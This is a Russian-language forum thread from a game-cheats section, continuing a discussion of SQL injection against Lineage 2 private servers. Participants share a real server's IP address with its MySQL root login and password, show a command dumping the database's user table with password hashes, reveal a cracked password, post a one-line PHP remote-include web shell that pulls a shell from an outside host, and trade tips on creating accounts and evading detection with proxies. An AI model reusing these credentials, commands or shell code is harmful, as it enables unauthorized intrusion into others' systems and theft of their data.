Регистрация Главная Сообщество
Сообщения за день Справка Регистрация

SQL инъекция

-

Баги и читы Lineage 2

- Уязвимости, баги и читы для Lineage 2 в этом разделе

Ответ
 
Опции темы
Старый 07.03.2010, 18:58   #31
 Разведчик
Аватар для TPO9lH
 
TPO9lH никому не известный тип
Регистрация: 18.05.2009
Сообщений: 3
Популярность: 10
Сказал(а) спасибо: 3
Поблагодарили 0 раз(а) в 0 сообщениях
Отправить сообщение для TPO9lH с помощью ICQ Отправить сообщение для TPO9lH с помощью Skype™
 
По умолчанию Re: SQL инъекция

[Ссылки могут видеть только зарегистрированные пользователи. ]

Нашел там пароль к мускулю и дальше нечего неполучается. Плиз ктонить раскажите подробнее на примере этого сервера как дальше действовать чтобы получить доступ к БД.
  Ответить с цитированием
Старый 09.03.2010, 02:55   #32
 Разведчик
Аватар для TPO9lH
 
TPO9lH никому не известный тип
Регистрация: 18.05.2009
Сообщений: 3
Популярность: 10
Сказал(а) спасибо: 3
Поблагодарили 0 раз(а) в 0 сообщениях
Отправить сообщение для TPO9lH с помощью ICQ Отправить сообщение для TPO9lH с помощью Skype™
 
По умолчанию Re: SQL инъекция

necros555 поскольку я еще немогу отсылать личные сообщения то оставлю тут данные. Кароч их ип 216.245.218.197. Логин мускуля root, пароль l2ct2v1. Еще нашол где там папка мускуля лежит но дальше несмог командами описаными в теме его запустить. Если ктото сможет дальше меня дойти просьба отписаться в теме.
  Ответить с цитированием
Старый 09.03.2010, 09:49   #33
 Разведчик
Аватар для CeDou
 
CeDou на правильном пути
Регистрация: 07.02.2010
Сообщений: 31
Популярность: 26
Сказал(а) спасибо: 47
Поблагодарили 8 раз(а) в 6 сообщениях
 
По умолчанию Re: SQL инъекция

Цитата:
Сообщение от TPO9lHПосмотреть сообщение
necros555 поскольку я еще немогу отсылать личные сообщения то оставлю тут данные. Кароч их ип 216.245.218.197. Логин мускуля root, пароль l2ct2v1. Еще нашол где там папка мускуля лежит но дальше несмог командами описаными в теме его запустить. Если ктото сможет дальше меня дойти просьба отписаться в теме.

там локалхост, я тут давно уже побывал ('common.php' 07/03/2010)
  Ответить с цитированием
Старый 09.03.2010, 10:15   #34
Заблокирован
 Пехотинец
Аватар для 6a4a
 
6a4a скоро будет известен6a4a скоро будет известен6a4a скоро будет известен6a4a скоро будет известен
Регистрация: 01.09.2009
Сообщений: 64
Популярность: 331
Сказал(а) спасибо: 35
Поблагодарили 166 раз(а) в 42 сообщениях
Отправить сообщение для 6a4a с помощью ICQ
 
По умолчанию Re: SQL инъекция

Все там получается, команда cmd=c:\Arquiv~1\MySQL\MYSQLS~1.0\bin\mysql.exe -uroot -pl2ct2v1 mysql -e "select * from user" возвращает такой результат
Код:
Host	User	Password	Select_priv	Insert_priv	Update_priv	Delete_priv	Create_priv	Drop_priv	Reload_priv	Shutdown_priv	Process_priv	File_priv	Grant_priv	References_priv	Index_priv	Alter_priv	Show_db_priv	Super_priv	Create_tmp_table_priv	Lock_tables_priv	Execute_priv	Repl_slave_priv	Repl_client_priv	Create_view_priv	Show_view_priv	Create_routine_priv	Alter_routine_priv	Create_user_priv	Event_priv	Trigger_priv	ssl_type	ssl_cipher	x509_issuer	x509_subject	max_questions	max_updates	max_connections	max_user_connections
localhost	root	*7335A175F3C5359C140251429975DBC6E9F44921	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y					0	0	0	0
%	roott	*42AB34A073BC13108C7AA8786ABBF6789B830FB0	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y					0	0	0	0
Как видно, пользователя два. Один - root, доступ только с локалхоста. Второй - roott, доступ со всех ипов, но пасс не известен Это либо уже кто-то побывал тут, и сделал для себя юзера. Либо админ изначально для себя делал, что маловероятно.

Последний раз редактировалось 6a4a; 09.03.2010 в 10:17.
  Ответить с цитированием
Старый 09.03.2010, 11:29   #35
 Разведчик
Аватар для CeDou
 
CeDou на правильном пути
Регистрация: 07.02.2010
Сообщений: 31
Популярность: 26
Сказал(а) спасибо: 47
Поблагодарили 8 раз(а) в 6 сообщениях
 
По умолчанию Re: SQL инъекция

Цитата:
Сообщение от 6a4aПосмотреть сообщение
Все там получается, команда cmd=c:\Arquiv~1\MySQL\MYSQLS~1.0\bin\mysql.exe -uroot -pl2ct2v1 mysql -e "select * from user" возвращает такой результат
Код:
Host	User	Password	Select_priv	Insert_priv	Update_priv	Delete_priv	Create_priv	Drop_priv	Reload_priv	Shutdown_priv	Process_priv	File_priv	Grant_priv	References_priv	Index_priv	Alter_priv	Show_db_priv	Super_priv	Create_tmp_table_priv	Lock_tables_priv	Execute_priv	Repl_slave_priv	Repl_client_priv	Create_view_priv	Show_view_priv	Create_routine_priv	Alter_routine_priv	Create_user_priv	Event_priv	Trigger_priv	ssl_type	ssl_cipher	x509_issuer	x509_subject	max_questions	max_updates	max_connections	max_user_connections
localhost	root	*7335A175F3C5359C140251429975DBC6E9F44921	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y					0	0	0	0
%	roott	*42AB34A073BC13108C7AA8786ABBF6789B830FB0	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y					0	0	0	0
Как видно, пользователя два. Один - root, доступ только с локалхоста. Второй - roott, доступ со всех ипов, но пасс не известен Это либо уже кто-то побывал тут, и сделал для себя юзера. Либо админ изначально для себя делал, что маловероятно.

6а4а, что писать в теле файла, чтоб посредством его подключить внешний шел?
  Ответить с цитированием
Старый 09.03.2010, 12:10   #36
Заблокирован
 Пехотинец
Аватар для 6a4a
 
6a4a скоро будет известен6a4a скоро будет известен6a4a скоро будет известен6a4a скоро будет известен
Регистрация: 01.09.2009
Сообщений: 64
Популярность: 331
Сказал(а) спасибо: 35
Поблагодарили 166 раз(а) в 42 сообщениях
Отправить сообщение для 6a4a с помощью ICQ
 
По умолчанию Re: SQL инъекция

<?php include($_GET["src"]);?>

Использовать как shell.php?src=www.faka.narod.ru/shell2.php
внешний инклуд частенько запрещен, либо в настройках сервера, либо хостером. Если внешний инклюд не проходит, попробуй подцепть локальный пхп-скрипт, что б проверить работает ли вообще твой скрипт Локальный путь указывается относительно твоего шелла.
  Ответить с цитированием
Пользователь сказал cпасибо:
CeDou (09.03.2010)
Старый 10.03.2010, 06:24   #37
 Разведчик
Аватар для Xacan
 
Xacan никому не известный тип
Регистрация: 07.03.2010
Сообщений: 11
Популярность: 14
Сказал(а) спасибо: 0
Поблагодарили 2 раз(а) в 1 сообщении
Отправить сообщение для Xacan с помощью ICQ
 
По умолчанию Re: SQL инъекция

Цитата:
Сообщение от 6a4aПосмотреть сообщение
Как видно, пользователя два. Один - root, доступ только с локалхоста. Второй - roott, доступ со всех ипов, но пасс не известен Это либо уже кто-то побывал тут, и сделал для себя юзера. Либо админ изначально для себя делал, что маловероятно.

Пароль юзера roott: owned
Неужели не догадаются сначала проверить свой пароль по хеш базам.. Судя по паролю действительно кто то побывал

Последний раз редактировалось Xacan; 10.03.2010 в 06:44.
  Ответить с цитированием
Старый 17.03.2010, 20:32   #38
 Разведчик
Аватар для DEIVIL
 
DEIVIL никому не известный тип
Регистрация: 06.02.2010
Сообщений: 5
Популярность: 12
Сказал(а) спасибо: 0
Поблагодарили 1 раз в 1 сообщении
 
По умолчанию Re: SQL инъекция

если за этим делом тебя спалят(за дефейс сайта через иньекцию и заливку шелла на сервер и получения доступа к базе данных)-примерно дадут 2 года
поэтому при взломе юзайте прокси
  Ответить с цитированием
Старый 17.03.2010, 20:39   #39
 Разведчик
Аватар для CeDou
 
CeDou на правильном пути
Регистрация: 07.02.2010
Сообщений: 31
Популярность: 26
Сказал(а) спасибо: 47
Поблагодарили 8 раз(а) в 6 сообщениях
 
По умолчанию Re: SQL инъекция

Цитата:
Сообщение от DEIVILПосмотреть сообщение
если за этим делом тебя спалят(за дефейс сайта через иньекцию и заливку шелла на сервер и получения доступа к базе данных)-примерно дадут 2 года
поэтому при взломе юзайте прокси

на всех проксях (если это не взломаный серв и там спец не повесили шел для пользования) все движения логируются, так что тоже мало кому поможет
  Ответить с цитированием
Старый 18.03.2010, 00:42   #40
Заблокирован
 Пехотинец
Аватар для necros555
 
necros555 скоро будет известенnecros555 скоро будет известенnecros555 скоро будет известен
Регистрация: 09.12.2009
Сообщений: 60
Популярность: 234
Сказал(а) спасибо: 25
Поблагодарили 112 раз(а) в 59 сообщениях
 
По умолчанию Re: SQL инъекция

Цитата:
Сообщение от DEIVILПосмотреть сообщение
если за этим делом тебя спалят(за дефейс сайта через иньекцию и заливку шелла на сервер и получения доступа к базе данных)-примерно дадут 2 года
поэтому при взломе юзайте прокси

вор пойдет заявлять на вора? гфш сами собой нарушение так что лажа это все
  Ответить с цитированием
Старый 18.03.2010, 19:40   #41
 Разведчик
Аватар для Xacan
 
Xacan никому не известный тип
Регистрация: 07.03.2010
Сообщений: 11
Популярность: 14
Сказал(а) спасибо: 0
Поблагодарили 2 раз(а) в 1 сообщении
Отправить сообщение для Xacan с помощью ICQ
 
По умолчанию Re: SQL инъекция

Цитата:
Сообщение от necros555Посмотреть сообщение
вор пойдет заявлять на вора? гфш сами собой нарушение так что лажа это все

А как же GPL? Ява сервера не попадают под статью.
Да по сути неважно что ты ломал, какой сервер и что он нарушал. После того как ты получил доступ на чужой компьютер ты уже попадаешь под статью.

"Неправомерный доступ к компьютерной информации (ст. 272 УК) Статья 272 УК предусматривает ответственность за неправомерный доступ к компьютерной информации (информации на машинном носителе, в ЭВМ или сети ЭВМ), если это повлекло уничтожение, блокирование, модификацию либо копирование информации, нарушение работы вычислительных систем. Данная статья защищает право владельца на неприкосновенность информации в системе. Владельцем информационной вычислительной системы может быть любое лицо, правомерно пользующееся услугами по обработке информации как собственник вычислительной системы (ЭВМ, сети ЭВМ) или как лицо, приобретшее право использования компьютера."
________________
• Debugged programm was unable to process exception. Terminating...
  Ответить с цитированием
Старый 19.03.2010, 05:17   #42
Заблокирован
 Пехотинец
Аватар для sk1m
 
sk1m неизвестен в этих краяхsk1m неизвестен в этих краяхsk1m неизвестен в этих краяхsk1m неизвестен в этих краяхsk1m неизвестен в этих краяхsk1m неизвестен в этих краяхsk1m неизвестен в этих краяхsk1m неизвестен в этих краяхsk1m неизвестен в этих краяхsk1m неизвестен в этих краях
Регистрация: 23.07.2009
Сообщений: 57
Популярность: -1434
Сказал(а) спасибо: 98
Поблагодарили 844 раз(а) в 122 сообщениях
 
По умолчанию Re: SQL инъекция

подскажите как через эту самую командную строку cmd создать учетку???

Добавлено через 1 час 33 минуты
пароль на учетке не меняется а вот /add не работает =( что делать не подскажите???

Последний раз редактировалось sk1m; 19.03.2010 в 06:51. Причина: Добавлено сообщение
  Ответить с цитированием
Старый 19.03.2010, 11:09   #43
 Разведчик
Аватар для CeDou
 
CeDou на правильном пути
Регистрация: 07.02.2010
Сообщений: 31
Популярность: 26
Сказал(а) спасибо: 47
Поблагодарили 8 раз(а) в 6 сообщениях
 
По умолчанию Re: SQL инъекция

Цитата:
Сообщение от sk1mПосмотреть сообщение
подскажите как через эту самую командную строку cmd создать учетку???

Добавлено через 1 час 33 минуты
пароль на учетке не меняется а вот /add не работает =( что делать не подскажите???

сделай себе доступ, зайди через навикат и делай себе кучу учеток
  Ответить с цитированием
Старый 04.12.2010, 13:06   #44
 Разведчик
Аватар для 3acuson
 
3acuson никому не известный тип
Регистрация: 27.08.2009
Сообщений: 5
Популярность: 14
Сказал(а) спасибо: 0
Поблагодарили 2 раз(а) в 1 сообщении
 
По умолчанию Re: SQL инъекция

Есть сервер,поля подобрал но путь не как не могу узнать выручайте =(
  Ответить с цитированием
Старый 29.12.2010, 12:36   #45
 Разведчик
Аватар для Diod350
 
Diod350 никому не известный тип
Регистрация: 15.12.2009
Сообщений: 1
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: SQL инъекция

Спасибо за статью.Очень помогла,а то никак не мог разобраться с иньками.
  Ответить с цитированием
Ответ


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Уязвимость] [VIP] Инъекция некоторых птс Hummel Подполье Lineage 2 (0 уровень) 0 22.11.2008 19:01

Заявление об ответственности / Список мошенников

Часовой пояс GMT +4, время: 05:27.

Пишите нам: [email protected]
Copyright © 2024 vBulletin Solutions, Inc.
Translate: zCarot. Webdesign by DevArt (Fox)
G-gaMe! Team production | Since 2008
Hosted by GShost.net